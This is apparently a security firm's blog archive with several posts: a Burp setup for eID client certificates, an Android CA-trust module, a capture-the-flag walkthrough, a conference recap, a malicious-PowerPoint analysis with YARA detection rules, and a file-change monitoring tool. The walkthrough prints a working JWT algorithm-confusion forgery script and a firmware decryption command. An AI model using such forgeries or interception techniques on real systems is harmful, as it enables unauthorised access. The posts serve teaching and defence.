Category Archives: Tools

Intercepting Belgian eID (PKCS#11) traffic with Burp Suite on OS X / Kali / Windows

TL;DR: You can configure Burp to use your PKCS#11 (or Belgian eID) card to set up client-authenticated SSL sessions, which you can then intercept and modify.

This blog post shows how you can easily view and modify your own local traffic.  In order to complete this tutorial, you still need a valid eID card and the corresponding PIN code. This article does not mean that there is a vulnerability in PKCS#11 or Belgian eID; it only shows that intercepting this traffic is possible for research purposes.

We sometimes come across web applications that are only accessible if you have a valid Belgian eID card, which contains your public/private key. Of course, we still need to intercept the traffic with Burp, so we have to do some setting up. Because I always forget the proper way to do it, I decided to write it down and share it with the internets.

This guide was written for OS X, but I will add information for Windows & Kali too where it differs from OS X. This guide also assumes that you’ve correctly installed your eID card already, which is a whole challenge in itself…

The target

The Belgian government has created a test page for this. Once you click "Start Test", you will be taken to the HTTPS version, which requires your client certificate. After entering your PIN code, you can view the result of the test:


The first thing to do is set your browser to use Burp as your proxy. This can easily be done by using FoxyProxy (FireFox)/SwitchyOmega (Chrome) or your system-wide proxy (shiver).

After setting your browser to proxy through Burp, the site will not yet be able to load your client certificate:


Configuring Burp

Setting up Burp is not too difficult. The main challenge is finding out the location of the PKCS#11 library file. I’ve listed the locations for OS X, Kali and Windows below.

  1. Insert your eID card into the reader and restart Burp
  2. Go to Project settings -> SSL Tab -> Override user options and click ‘Add’
  3. Host: <empty> (or be specific, if you want)
    Certificate type: Hardware token (PKCS#11)
  4. Supply the path of the correct library. Here are some locations:
    1. OS X
      /usr/local/lib/libbeidpkcs11.dylib (symlinked to /usr/local/lib/libbeidpkcs11.4.3.5.dylib in my case. There might be multiple versions there; if one doesn’t work, try another)
    2. Windows
      C:\Windows\System32\beid_ff_pkcs11.dll,
      or use the auto search function
    3. Kali
      (see “building from source” below)
  5. If you get “Unable to load library – check file is correct and device is installed”, restart Burp with your eID already plugged in and working in the eID viewer.
  6. Enter your PIN, click refresh and select the Authentication certificate:
  7. Optionally, restart FireFox / Burp (this fixed an issue once)

Et voila, we can now use Burp to intercept the traffic:


Building from source on Kali (Rolling, 2017.3)

Installing the default Debian package doesn’t seem to work, so we’ll have to compile from source. You can do this by following the steps listed below.

Note that we’ve had Kali VMs crash on boot after installing the dependencies below and compiling the source. An easy solution is to take a snapshot, compile, and copy over the .so, or use the one we compiled.

> wget
> tar -xvf eid-mw-4.3.3-v4.3.3.tar.gz
> cd eid-mw-4.3.3-v4.3.3
> apt-get install pkg-config libpcsclite-dev libgtk-3-dev libxml2-dev libproxy-dev libssl-dev libcurl4-gnutls-dev
> ./configure && make && make install

After these steps, you can find the .so library at /usr/local/lib/
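
Before pointing Burp at the freshly built library, it can help to verify that it actually loads and sees your card. Below is a minimal sketch that does this with the PyKCS11 Python package; the library file name is an assumption, adjust it to whatever ended up in /usr/local/lib/:

# Minimal sanity check (a sketch, assuming the PyKCS11 package is installed
# and the built library is named libbeidpkcs11.so - adjust the path if not).
from PyKCS11 import PyKCS11Lib

lib = PyKCS11Lib()
lib.load("/usr/local/lib/libbeidpkcs11.so")

# List the tokens (cards) currently present in the reader.
for slot in lib.getSlotList(tokenPresent=True):
    token = lib.getTokenInfo(slot)
    print(f"slot {slot}: {token.label.strip()} ({token.manufacturerID.strip()})")

If this prints your card's token label, Burp should be able to load the same library without complaints.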

About the author

Jeroen Beckers is a mobile security expert working in the NVISO Cyber Resilience team. He also loves to program, both high-level and low-level, and diving deep into Android internals doesn’t scare him. You can find Jeroen on LinkedIn.



Intercepting HTTPS Traffic from Apps on Android 7+ using Magisk & Burp

Intercepting HTTPS traffic is a necessity for any mobile security assessment, and adding a custom CA to Android makes this easy. As of Android Nougat, however, apps no longer trust user-installed certificates unless they explicitly opt in. In this blog post, we present a new Magisk module that circumvents this requirement by automatically adding user certificates to the system-wide trust store, which is trusted by all apps by default.

Basic HTTPS interception

Intercepting HTTPS on Android is a very straightforward job, which only takes a few steps:

  1. Set Burp as your proxy
  2. Visit http://burp
  3. Install the Burp certificate as a user certificate
  4. Intercept

After following these steps, you can view all HTTPS traffic that is sent through the user’s browser. A more detailed explanation can be found on Portswigger’s website.

In the past, this approach would even work for app traffic, as applications trusted all installed user certificates by default. One way to prevent app traffic from being intercepted is by implementing certificate pinning. With certificate pinning, the certificates presented by the server on each SSL connection are compared to a locally stored version, and the connection only succeeds if the server can prove the expected identity. This is a great security feature, but it can be tricky to implement.

Enter Android Nougat

Starting with Android Nougat, apps no longer trust user certificates by default. A developer can still choose to accept user certificates by referencing a network security configuration through the android:networkSecurityConfig attribute in the app’s AndroidManifest.xml, but by default they are no longer trusted.

A first approach would be to decompile, modify and recompile the application, which takes quite a few steps. If the app turns out to have protection against repackaging, this also becomes very difficult. An example of this technique can be found online.

A different approach is adding the user certificate to the system store. The system store is located at /system/etc/security/cacerts and contains a file for each installed root certificate.

A very simple solution would be copying the user-installed certificates (found at /data/misc/user/0/cacerts-added) to this folder. This is only possible, however, if /system is mounted read/write. Now, while it is possible to remount /system and perform the necessary actions, this is a rather dirty solution and some root-detection algorithms will detect this modification.

Using Magisk

Magisk is a “Universal Systemless Interface, to create an altered mask of the system without changing the system itself.” The fact that Magisk doesn’t modify the /system partition makes it a very nice solution for security assessments where the application has enhanced root detection. By activating “Magisk Hide” for the targeted application, Magisk becomes completely invisible.

Magisk also supports custom modules that are fairly easy to create. In order to have user certificates recognized as system certificates, we made a simple Magisk module, which can be found on our GitHub. The logic of the module is very basic:

  1. Find installed user certificates
  2. Add them to the /system/etc/security/cacerts directory

When installed, the content of the Magisk module is mounted on /magisk/trustusercerts/. This folder contains multiple files, but the most important one is the system directory. This directory is automatically merged with the real /system directory, without actually touching the /system partition. As a result, all certificates placed under /magisk/trustusercerts/system/etc/security/ end up in /system/etc/security.
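
For illustration only, the same logic can be mimicked from the host over adb. The sketch below is hedged: it assumes a rooted device, the paths mentioned in this post, and that the module's overlay directory is writable. It is not the module itself, which performs these steps on-device at boot:

# Host-side illustration of the module's logic (NOT the actual module):
# copy user-added certificates into the module's overlay directory over adb.
# Assumes a rooted device and the paths described in this post.
import subprocess

USER_CERTS = "/data/misc/user/0/cacerts-added"
MODULE_CERTS = "/magisk/trustusercerts/system/etc/security/cacerts"

def adb_shell(command: str) -> str:
    result = subprocess.run(["adb", "shell", "su", "-c", command],
                            capture_output=True, text=True, check=True)
    return result.stdout

for cert in adb_shell(f"ls {USER_CERTS}").split():
    adb_shell(f"cp {USER_CERTS}/{cert} {MODULE_CERTS}/")
    print(f"copied {cert}")

print("Reboot the device so the overlay is mounted over /system.")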

Using the module is easy:

  1. Install the module
  2. Install certificates through the normal flow
  3. Restart your device

After installation, the certificates will show up in your system wide trust store and will be trusted by applications:



Of course, if the application has implemented SSL Pinning, you still won’t be able to intercept HTTPS traffic, but this little module makes Android Nougat apps perform the same way as pre-Android Nougat apps.

If you have any suggestions on how to improve this module, or any ideas on how to add the ability to disable SSL Pinning on the Magisk level, let us know!

Download Magisk Module from Github

About the author

Jeroen Beckers is a mobile security expert working in the NVISO Cyber Resilience team. He also loves to program, both high-level and low-level, and diving deep into Android internals doesn’t scare him. You can find Jeroen on LinkedIn.

Hack Our Train

This year, in an effort to raise awareness about IoT security, we launched the Hack Our Train challenge. For over three weeks, a model train tirelessly chugged on its tracks inside our IoT village at Co.Station Brussels and then once more for two days at BruCON 2017. We provided it with an emergency brake system powered by IoT technologies and challenged people to hack it and stop the train! With every successful hack, the train stopped, creating a service disruption. A live-stream allowed hackers to monitor the effects of their attacks.

The Hack Our Train challenge was actually composed of two parts: a local one, set up next to the IoT village, and an online counterpart. The local challenge did not require any specific technical skills: it invited people to try to crack the PIN of the controller that activates the emergency brake mechanism. Check out this video of people having fun with the controller:

But the online part is where things became really interesting! Over the course of the challenge, only a handful of people succeeded in figuring it out and remotely stopping the train… In this post, we’ll provide a walk-through of the challenge and focus on some of the vulnerabilities featured in it and, more importantly, on ways to fix them.

Hunt for the firmware

On the challenge website, we provided aspiring hackers with the following scenario: Bob, one of the IoT village’s railroad technicians, recently had to update the emergency brake panels. Unfortunately Bob left his USB flash drive lying around, and Eve found it and made its contents available online!

The first step is to analyze the USB drive’s contents. It is a zip archive containing two files: firmware.enc, whose name conveniently hints at an encrypted firmware, and a binary called firmware_updater. The firmware updater is used to decrypt the firmware and then upload it to the control panel via a serial connection.

If we execute it on a Linux machine, the firmware_updater asks us for a PIN before decrypting the firmware. People who braved the challenge came up with all sorts of clever ways of cracking the firmware_updater binary and forcing it to decrypt the firmware.

For now, we will resist the temptation of breaking out our disassemblers and debuggers and we will just look at the strings inside the updater. There are some really interesting parts:



If we think this out (of course, disassembling would make this much easier), the firmware seems to be encrypted using AES. To perform the decryption ourselves, we would need the key and the initialization vector (IV). Luckily, these are hard-coded into the firmware updater (see image above).

So, we just need to turn those into their hexadecimal counterparts and we are set:

> openssl enc -aes-128-cbc -d -in firmware.enc -out firmware -iv 766563353667647639396e6e73647161 -K 686f746b3138313965663132676a7671
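
If you prefer to script it, the same decryption can be done in Python. This is a minimal sketch that assumes the cryptography package is installed and reuses the key and IV hex values from the openssl command above:

# Equivalent decryption in Python (a sketch, assuming the `cryptography` package).
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = bytes.fromhex("686f746b3138313965663132676a7671")  # same -K value as above
iv = bytes.fromhex("766563353667647639396e6e73647161")   # same -iv value as above

with open("firmware.enc", "rb") as f:
    ciphertext = f.read()

decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
plaintext = decryptor.update(ciphertext) + decryptor.finalize()
plaintext = plaintext[:-plaintext[-1]]  # strip the PKCS#7 padding that openssl removes for us

with open("firmware", "wb") as f:
    f.write(plaintext)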

Vulnerability: use of hardcoded cryptographic keys.

Fix: if possible, avoid using schemes that require hardcoded keys. If using a hardcoded key is unavoidable, there are techniques that can be employed to make the key harder to recover. Ideally, decryption should be performed directly on the embedded device, which avoids the need to expose the key in the firmware updater.

One last word on the update procedure we just cracked: now that we have the keys, no one can stop us from modifying the decrypted firmware to add or remove some functionalities, encrypting it again and uploading it to the device. The emergency controller would have no means of knowing if the firmware has been tampered with.

Vulnerability: firmware not digitally signed.

Fix: Digitally sign the firmware so that the embedded device can verify its authenticity.

Inside the firmware

Phew, we have the firmware; now comes the hard part: we have to reverse engineer it and find a way to remotely trigger the emergency brake mechanism.

Using the file command on the firmware reveals it is in fact a Java archive. This is really good news: using a Java decompiler, we can easily recover the source code.

Vulnerability: code is easy to reverse engineer. Attackers have easy access to the internal workings of the application, which makes it easier for them to find exploits.

Fix: use a code obfuscation tool – there are many available online, both free and commercial. Once you have used the tool on your code, test your application to make sure that it is still functioning correctly. Remember that obfuscation is not a silver bullet but it can drastically increase the effort required for an attacker to break the system.

Before looking at the code, let’s try running the firmware. We are greeted with a status page containing a button to initiate an emergency brake, but we need a PIN.


A quick look inside the source code reveals that it is simply “1234”. We have managed to unlock the button. Spoiler: it doesn’t work!

Vulnerability: use of hardcoded passwords.
In our scenario, the password was of no immediate use. Still, this would be harmful if we ever had access to a real emergency brake controller.

Fix: if the password must be stored inside the application, it should at least be stored using a strong one-way hash function. Before hashing, the password should be combined with a unique, cryptographically strong salt value.

In order to understand what is going on, we can simply look at the debug messages conveniently left behind in the console. It seems the protocol used is MQTT, and for some reason we receive an authentication failure when we try to trigger the emergency brake.

Vulnerability: leftover debug messages containing useful information.

Fix: scan your code for forgotten prints (System.out calls in our case) and remove them before release, or disable them at runtime.

Look below the hood

Before going further, let’s take a step back and have a closer look at the architecture of our system. This step was of course not needed to solve the challenge, but we thought it complements this walk-through nicely!

As we just discovered by looking at the source code, communication is based on the MQTT protocol, often found among IoT applications. MQTT works on top of TCP/IP and defines two kinds of entities: Subscribers and Publishers. Publishers send messages on communication channels called Topics. Subscribers can register and read messages on specific Topics. These messages are relayed with the help of a server (also called a Broker).
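
As a concrete illustration of this pattern, here is a small sketch using the paho-mqtt package (1.x style API); the broker address and topic names are made up for the example and are not the challenge's real ones:

# Illustration of the publish/subscribe pattern described above (paho-mqtt 1.x API).
# Broker address and topic names are placeholders, not the challenge's real ones.
import paho.mqtt.client as mqtt

def on_message(client, userdata, msg):
    print(f"{msg.topic}: {msg.payload.decode()}")

client = mqtt.Client()
client.on_message = on_message
client.connect("broker.example.com", 1883)

client.subscribe("train/speed")               # subscriber side: receive speed updates
client.publish("train/emergency", "BRAKE")    # publisher side: send an emergency brake message
client.loop_forever()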


This is a look below the hood of the mountain (this was our beta setup, our final circuit was much cleaner!). Two elements steal the show: an Arduino and a Raspberry Pi. The Arduino is the muscle: it controls the transistor that stops the train. The Pi is the brains: when it receives an emergency brake message, it orders the Arduino to stop the train.

Both the emergency brake controller (where the firmware runs – it is not shown in the picture) and the Raspberry Pi (shown in the picture) are connected to the internet. They communicate with the MQTT Broker to exchange MQTT messages. The Pi publishes messages concerning the train’s speed but it is also subscribed to a topic waiting for emergency brake messages. The controller displays the train’s current speed and, when the emergency brake is activated, it publishes an emergency brake message that the Broker relays to the Pi.

Of course, not just anyone can send an emergency brake message to the server. In our infrastructure, authentication is based on JWT tokens. These are issued by the server relaying the MQTT messages and they are signed using the server’s private key. When clients try to authenticate using one of those tokens, the server can verify their authenticity using its public key.

To clear all this up, we have created an overview of the MQTT communications going on in the images below:



Tokens, tokens everywhere…

Back to the authentication problem. Digging into the source code confirms that authentication is JWT token based. Maybe there is something wrong with the token? Another file inside the JAR that immediately draws our attention is notes.txt. A quick look reveals some notes from a developer who was worried about his JWT token expiring. We can easily verify the creation date of the token here. It seems our token is really old, and as we don’t have the authentication server’s private key, we cannot create a new one.

Vulnerability: old and unused left behind files containing sensitive information.

Fix: before publishing your product, make sure to remove every non-essential resource.

Knowing how the authentication works, it is time to turn to our favorite search engine for more intelligence. Let’s try "jwt token vulnerability". The top result states "Critical vulnerabilities in JSON Web Token libraries": perfect!

The author does a great job of explaining the vulnerability and how it can be exploited, so we leave you in his hands. For the purposes of this post, the idea is that if we create a forged token using the authentication server’s public key as an HMAC secret key, we can fool the server into verifying it using HMAC instead of RSA, which results in the server accepting our token.


Having identified the vulnerability, it is time to perform our attack. For that, we need the server’s public certificate, which is kindly included in the JAR as well. As mentioned in the notes file, it has been converted to a format compatible with Java but the server is more likely using it in PEM format.

Luckily, converting it back is easy:

> keytool -importkeystore -srckeystore hot.ks -destkeystore temp.p12 -srcstoretype jks -deststoretype pkcs12
> openssl pkcs12 -in temp.p12 -out public.pem


Next, we have to create our malicious token. You can do this in the language of your choice. We used the jwt-simple node.js module.
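
For reference, the same forgery can be done with nothing but the Python standard library. This is a sketch: it signs the token with HMAC-SHA256 using the public key PEM as the secret, and the payload claims are placeholders that should mirror those of the original token:

# Sketch of the HS256/RS256 confusion attack in plain Python: sign a forged JWT
# with HMAC-SHA256, using the server's *public* key PEM as the HMAC secret.
# The payload claims below are placeholders; mirror the original token's claims.
import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

with open("public.pem", "rb") as f:
    secret = f.read()  # the PEM we converted with keytool/openssl above

header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())   # claim HMAC instead of RSA
payload = b64url(json.dumps({"sub": "emergency-brake"}).encode())      # placeholder claim
signature = b64url(hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest())

print(f"{header}.{payload}.{signature}")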

With the malicious token crafted, we can finally perform the attack. The easiest way is to reuse the code included in a file conveniently forgotten inside the JAR. We just have to replace the token found in the code, compile the code and execute it from the terminal.

The select few who made it this far in the challenge saw the train stop on the live-stream and received the flag!

Vulnerability: using components with known vulnerabilities.

Fix: apply upgrades to components as they become available. For critical components (for example, those used for authentication), monitor security news outlets (databases, mailing lists etc.) and act upon new information to keep your project up to date.

Lessons learned

Our challenge involved a toy train but the IoT vulnerabilities demonstrated inside are the real deal. We added each one of them to the IoT challenge because we have come across them in the real world.

On a final note, we would like to congratulate those who were able to hack our train and we sincerely hope that all of you enjoyed this challenge!


Staying up to date with the latest hot topics in Security is a requirement for any Security Consultant. Going to conferences is a great way of doing this, as it also gives you the opportunity to speak to peers and get a good view into what the security industry and the researchers are up to.

This year, we sent a small delegation to DEF CON, one of the best-known security conferences in the world. We think everyone should go there at least once in their career, so this year we sent Michiel, Cédric, Jonas and Jeroen to get their geek on in Las Vegas!

From left to right: Cédric, Michiel, Jonas and Jeroen ready for their first DEF CON!
Ready to turn off your phones and laptops…

The conference was held at Caesar’s Palace’s conference center, right in the middle of the famous strip. There were four parallel tracks for talks and a lot of different villages and demos throughout the entire conference. We know that What happens in Vegas, Stays in Vegas, but some of these talks were just too good not to share!

Internet of Things (IoT)

There was a large focus on IoT this year, which was great news for us, as we’re actively evolving our IoT skillset. Cédric, our resident IoT wizard, has been running around from talk to talk.

A further update on the IoT track will be provided by Cédric once he is back from holidays 🙂


The number of talks on Android / iOS was fairly limited, but there were definitely some talks that stood out. Avi Bashan gave a talk on Android packers. The presentation is very thorough and tells the story of how they used a few of the most popular packers to devise an algorithm for detecting and unpacking variations of the same concept. Their approach is very well explained and could be really interesting for our own APKScan service.


A typical flow of Android Packers (source)

On Sunday, Stephan Huber and Siegfried Rasthofer presented a talk on their evaluation of 9 popular password managers for Android. Their goal was to extract as much sensitive information as possible on a non-rooted device. Even though you would expect password managers to put some effort into securing their application, it turns out this is rarely the case. The following slide gives a good overview of their results, but be sure to check out the entire paper for more information.


The results of Stephan Huber and Siegfried Rasthofer’s research on Android Password Managers (source)


One of the most interesting talks for us was given by John Sotos (MD). While almost all talks focus on very technical subjects, John gave an introduction to the Cancer Moonshot project and explained why the creation of a gene-altering virus targeted at specific DNA traits is inevitable. This is of course great from a cancer-treatment point of view, but what if someone were to alter the virus to attack different genes? Maybe an extremist vegetarian could make the entire world allergic to meat, or maybe a specific race could be made infertile… In his talk, John explains what could go wrong (and he is very creative!) and how important it is to find a defense against these kinds of viruses even before they actually exist.


Crypto Village

One of our biggest projects within NVISO Labs consists of building an out-of-band network monitoring device. In recent years, we’ve seen a lot of the web shift to HTTPS.


While this is definitely a good thing in terms of security, it does limit the possibilities for monitoring network traffic. Malware authors know this as well and are increasingly adopting TLS/HTTPS for their C&C communications (e.g. the Dridex family). In the crypto village, Lee Brotherston demonstrated various techniques to fingerprint TLS connections and even showed a working PoC. This could allow us to create fingerprints for various malware communications and detect them on the network. More information can be found on Lee’s GitHub page.

Car Hacking Village

When we were looking through the villages available at DEF CON this year, the new Car Hacking Village immediately caught our attention. In the room were several cars with laptops hooked up to the dashboards and people trying to completely take over the controls. In the middle of the room was a brand new Dodge Viper whose steering controls had been reprogrammed to control a video game instead of the actual car. Some of our colleagues even got the chance to test drive it! Although with mixed results …


Jonas learning how to drive a sports car (and not doing a great job 😜).

Packet Hacking Village

The Packet Hacking Village (PHV) is one of the biggest, if not the biggest, village in DEF CON. It’s also the place where Jonas spent a lot of his time, meticulously following talks and taking notes. Different talks could be linked to various steps of the cyber kill chain and were interesting to consider for red teaming assessments or as part of the blue team protecting against these attacks.

One of the presentations that stilled our offensive hunger was given by Gabriel Ryan and discussed wireless post-exploitation techniques. One of the attacks allows an attacker to steal AD credentials through a wireless attack using a ‘hostile portal’ that redirects a victim’s HTTP traffic to SMB on the attacker’s machine. This and his other attacks were facilitated by his own eaphammer tool.

Our blue side was satisfied as well with a talk on Fooling the Hound, which attempts to thwart attackers making use of the BloodHound tool, aimed at visualizing the relationships within an AD environment. His deceptions include fake high-privilege credentials, which increase the shortest path towards a high-value asset. The resulting BloodHound graph showed a greatly increased number of nodes and edges, thereby complicating an attacker’s lateral movements!

Meetup with the CSCBE winners

As you may know, the winners of NVISO’s Cyber Security Challenge 2017 received tickets to DEF CON which was an excellent opportunity to have a little Vegas CSC reunion!


Return to sender

All good things come to an end, and so did the DEF CON conference. We had a really great time in Las Vegas, and everyone made it home safely without losing too much money at the poker table ;-).


Malicious PowerPoint Documents Abusing Mouse Over Actions

A new type of malicious MS Office document has appeared: a PowerPoint document that executes a PowerShell command by hovering over a link with the mouse cursor (this attack does not involve VBA macros).

In this blogpost, we will show how to analyze such documents with free, open-source tools.

As usual in attacks involving malicious MS Office documents, the document is delivered via email to the victims (MD5 DD8CA064682CCCCD133FFE486E0BC77C).

Using a tool to analyze MIME files, we can dissect the email received by the user:


The output indicates that the mail attachment is located in part 5. We select part 5 and perform a hex/ASCII dump of the first 100 bytes to get an idea of which type of file we are dealing with:


A file starting with PK is most likely a ZIP file. So let’s dump this file and pipe it into zipdump (a tool to analyze ZIP files):


It is indeed a ZIP file. Judging from the filenames in the ZIP file, we can assume it is a PowerPoint file: .pptx or .ppsx.

Using zipdump and option -E (the -E option provides extra information on the type of the contained files), we can get an idea of what type of files are contained in this PowerPoint file by looking at the headers and counting how many files have the same header:


So the ZIP file (.pptx or .ppsx) contains 1 JPEG file (JFIF), 11 empty files and 36 XML files.

As said at the beginning, malware authors can abuse the mouse-over feature of PowerPoint to launch commands. This can be done with a URL using the ppaction:// protocol to launch a PowerShell command.

To identify if this document abuses this feature, we can use YARA. We defined 2 simple YARA rules to search for the strings “ppaction” and “powershell”:

rule ppaction {
    strings:
        $a = "ppaction" nocase
    condition:
        $a
}

rule powershell {
    strings:
        $a = "powershell" nocase
    condition:
        $a
}

We apply the YARA rules to each file contained in the ZIP file:
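
If you want to script this step yourself, a rough standalone equivalent can be built with the yara-python package; in the sketch below the sample file name is a placeholder:

# Sketch: scan every file inside the .ppsx/.pptx archive with the two rules above
# (assumes the yara-python package; the sample file name is a placeholder).
import yara
import zipfile

rules = yara.compile(source='''
rule ppaction { strings: $a = "ppaction" nocase condition: $a }
rule powershell { strings: $a = "powershell" nocase condition: $a }
''')

with zipfile.ZipFile("sample.ppsx") as archive:
    for index, name in enumerate(archive.namelist(), start=1):
        matches = rules.match(data=archive.read(name))
        if matches:
            print(index, name, [m.rule for m in matches])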


As shown above, file 19 (ppt/slides/slide1.xml, the first slide of the presentation) contains the string ppaction, and file 21 (ppt/slides/_rels/slide1.xml.rels) contains the string powershell.

Let’s take a look at file 19:


We can see that it contains an a:linkMouseOver element with an action to launch a program (ppaction://program). So this document will launch a program when the user hovers over a link with the mouse. Clicking is not required, as is explained here.

The program to be executed can be found with id rId2, but we already suspect that the program is PowerShell and that it is defined in file 21. So let’s take a look:


Indeed, as shown in the screenshot above, we have a Target=”powershell… command with Id=”rId2″. Let’s extract and decode this command. First we extract the Target values with a regular expression:


This gives us the URL-encoded PowerShell command (and a second Target value, a name for an .xml file, which is not important for this analysis). With a bit of Python code, we can use the urllib module to decode the URL:


Now we can clearly recognize the PowerShell command: it will download and execute a file. The URL is not completely clear yet. It is constructed by concatenating (+) strings and bytes cast to characters ([char] 0x2F) in PowerShell. Byte 0x2F is the ASCII value of the forward slash (/), so let’s use sed to replace this byte cast by the actual character:


And we can now “perform the string concatenation” by removing ‘+’ using sed again:


We can now clearly see from which URL the file is downloaded, that it is written in the temporary folder with .jse extension and then executed.
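
The same post-processing can be done in a few lines of Python; in this sketch, the encoded value is a placeholder for the real Target string extracted from ppt/slides/_rels/slide1.xml.rels:

# Sketch of the decoding steps above; `encoded` is a placeholder for the real Target value.
from urllib.parse import unquote

encoded = "powershell%20..."                  # placeholder: paste the extracted Target value here
decoded = unquote(encoded)                    # undo the URL encoding
decoded = decoded.replace("[char]0x2F", "/")  # resolve the byte cast, like the first sed command
decoded = decoded.replace("'+'", "")          # collapse the string concatenation, like the second sed
print(decoded)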

To extract the URL, we can use a regular expression again:


A .jse file is an encoded JavaScript file. It’s the same encoding as for VBE (encoded VBScript), and it can be decoded with a dedicated decoder tool.


It’s rather easy to detect potentially malicious PowerPoint files that abuse this feature by looking for the string ppaction (though this string can be obfuscated). The string powershell is also a good candidate to search for, but note that programs other than PowerShell can be used to perform a malicious action.


We produced a video demonstrating a proof-of-concept PowerPoint document that abuses mouse-over actions (we will not release this PoC). The video shows the alerts produced by Microsoft PowerPoint, and also illustrates what happens with documents that carry a mark-of-the-web (documents downloaded from the Internet or saved from email attachments).


Using binsnitch.py to detect files touched by malware

Yesterday, we released binsnitch.py – a tool you can use to detect unwanted changes to the file system. The tool and documentation are available on our GitHub.

Binsnitch can be used to detect silent (unwanted) changes to files on your system. It will scan a given directory recursively for files and keep track of any changes it detects, based on the SHA256 hash of the file. You have the option to either track executable files (based on a static list available in the source code), or all files. Binsnitch.py can be used for a variety of use cases, including:

  • Use binsnitch.py to create a baseline of trusted files for a workstation (golden image) and use it again later on to automatically generate a list of all modifications made to that system (for example caused by rogue executables installed by users, or dropped malware files). The baseline could also be used for other detection purposes later on (e.g., in a whitelist);
  • Use binsnitch.py to automatically generate hashes of executables (or all files if you are feeling adventurous) in a certain directory (and its subdirectories);
  • Use binsnitch.py during live malware analysis to carefully track which files are touched by malware (this is the topic of this blog post).

In this blog post, we will use binsnitch.py during the analysis of a malware sample.

A summary of the options available in binsnitch.py at the time of writing:

usage: binsnitch.py [-h] [-v] [-s] [-a] [-n] [-b] [-w] dir

positional arguments:
  dir               the directory to monitor

optional arguments:
  -h, --help        show this help message and exit
  -v, --verbose     increase output verbosity
  -s, --singlepass  do a single pass over all files
  -a, --all         keep track of all files, not only executables
  -n, --new         alert on new files too, not only on modified files
  -b, --baseline    do not generate alerts (useful to create baseline)
  -w, --wipe        start with a clean db.json and alerts.log file

We are going to use binsnitch.py to detect which files are created or modified by the sample. We start our analysis by creating a “baseline” of all the executable files on the system. We will then execute the malware and run binsnitch.py again to detect changes to disk.
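
Conceptually, the approach boils down to hashing files recursively, saving a baseline and diffing a later scan against it. The following is a simplified sketch of that idea, not binsnitch.py's actual code:

# Simplified sketch of the baseline/compare idea (not binsnitch.py's actual code):
# hash executable files recursively, save a baseline, rescan later and report changes.
import hashlib
import json
import os

TRACKED_EXTENSIONS = (".exe", ".dll", ".sys")  # illustrative subset only

def scan(root):
    hashes = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(TRACKED_EXTENSIONS):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, "rb") as f:
                        hashes[path] = hashlib.sha256(f.read()).hexdigest()
                except OSError:
                    pass  # skip locked or unreadable files
    return hashes

baseline = scan("C:/")
with open("baseline.json", "w") as f:
    json.dump(baseline, f)

# ... detonate the sample, then rescan and compare ...
for path, digest in scan("C:/").items():
    if path not in baseline:
        print("NEW      ", path, digest)
    elif baseline[path] != digest:
        print("MODIFIED ", path, digest)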

Creating the baseline


Command to create the baseline of our entire system.

We only need a single pass of the file system to generate the clean baseline of our system (using the “-s” option). In addition, we are not interested in generating any alerts yet (again: we are merely generating a baseline here!), hence the “-b” option (baseline). Finally, we run binsnitch.py with the “-w” argument to start with a clean database file.

After launching the command, binsnitch.py will start hashing all the executable files it discovers, and write the results to a folder called binsnitch_data. This can take a while, especially if you scan an entire drive (“C:/” in this case).


Baseline creation in progress … time to fetch some cheese in the meantime! 🐀 🧀

After the command has completed, we check the alerts file in “binsnitch_data/alerts.log”. As we ran with the “-b” option to generate a baseline, we don’t expect to see alerts:


Baseline successfully created! No alerts in the file, as we expected.

Looks good! The baseline was created in 7 minutes.

We are now ready to launch our malware and let it do its thing (of course, we do this step in a fully isolated sandbox environment).

Running the malware sample and analyzing changes

Next, we run the malware sample. After that, we can run binsnitch.py again to check which executable files have been created or modified:


Scanning our system again to detect changes to disk performed by the sample.

We again use the “-s” flag to do a single pass of all executable files on the “C:/” drive. In addition, we also provide the “-n” flag: this ensures we are not only alerted on modified executable files, but also on new files that might have been created since the creation of the baseline. Don’t run binsnitch.py with the “-w” flag this time, as this would wipe the baseline results. Optionally, you could also add the “-a” flag, which would track ALL files (not only executable files). If you do so, make sure your baseline is also created using the “-a” flag (otherwise, you will be facing a ton of alerts in the next step!).

Running the command above will again take a few minutes (in our example, it took 2 minutes to rescan the entire “C:/” drive for changes). The resulting alerts file (“binsnitch_data/alerts.log”) looks as following:


Bingo! We can clearly spot suspicious behaviour now by observing the alerts.log file. 🔥

A few observations based on the above:

  • The malware file itself was detected in “C:/malware”. This is normal of course, since the malware file itself was not present in our baseline! However, we had to copy it in order to run it;
  • A bunch of new files are detected in the “C:/Program Files (x86)/” folder;
  • More suspicious though are the new executable files created in “C:/Users/admin/AppData/Local/Temp” and the startup folder.

The SHA256 hash of the newly created startup item is readily available in the alerts.log file: 8b030f151c855e24748a08c234cfd518d2bae6ac6075b544d775f93c4c0af2f3

Doing a quick VirusTotal search for this hash results in a clear “hit” confirming our suspicion that this sample is malicious (see below). The filename on VirusTotal also matches the filename of the executable created in the C:/Users/admin/AppData/Local/Temp folder (“A Bastard’s Tale.exe”).
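
If you prefer to automate this lookup, the hash can also be queried through the VirusTotal API (v3). A small sketch, assuming the requests package and a valid API key (the key below is a placeholder):

# Sketch: look up the dropped file's hash via the VirusTotal API (v3).
# Requires an API key; the value below is a placeholder.
import requests

sha256 = "8b030f151c855e24748a08c234cfd518d2bae6ac6075b544d775f93c4c0af2f3"
headers = {"x-apikey": "YOUR_API_KEY"}

response = requests.get(f"https://www.virustotal.com/api/v3/files/{sha256}", headers=headers)
response.raise_for_status()
print(response.json()["data"]["attributes"]["last_analysis_stats"])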


VirusTotal confirms that the dropped file is malicious.

You can also dive deeper into the details of the scan by opening “binsnitch_data/data.json” (warning, this file can grow huge over time, especially when using the “-a” option!):


Details on the scanned files. In case a file is modified over time, the different hashes per file will be tracked here, too.

From here on, you would continue your investigation into the behaviour of the sample (network, services, memory, etc.) but this is outside the scope of this blog post.

We hope you find binsnitch.py useful during your own investigations. Let us know on GitHub if you have any suggestions for improvements, or if you want to contribute yourself!

Squeak out! 🐁